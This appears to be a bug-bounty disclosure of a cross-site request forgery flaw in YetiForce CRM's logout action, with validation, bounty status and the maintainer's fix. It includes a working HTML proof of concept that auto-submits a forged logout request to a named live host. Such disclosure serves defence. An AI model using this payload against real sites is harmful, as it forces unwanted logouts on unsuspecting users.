Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm

Valid

Reported on

Dec 9th 2021

Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://gitstable.yetiforce.com/index.php?module=Users&parent=Settings&action=Logout">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More details

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

Occurrences

Logout.php L11-L49

We are processing your report and will contact the yetiforcecompany/yetiforcecrm team within 24 hours. 2 years ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

Mariusz Krzaczkowski validated this vulnerability 2 years ago

KhanhCM has been awarded the disclosure bounty

The fix bounty is now up for grabs

Mariusz Krzaczkowski marked this as fixed in 6.3.0 with commit 585da0 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Logout.php#L11-L49 has been validated

Mariusz Krzaczkowski Mariusz

commented 2 years ago

Maintainer

The patch is available in 6.2.0_SecurityFix_v2.zip https://github.com/YetiForceCompany/UpdatePackages/tree/master/YetiForce%20CRM%206.x.x/6.2.0_SecurityFix/zip

to join this conversation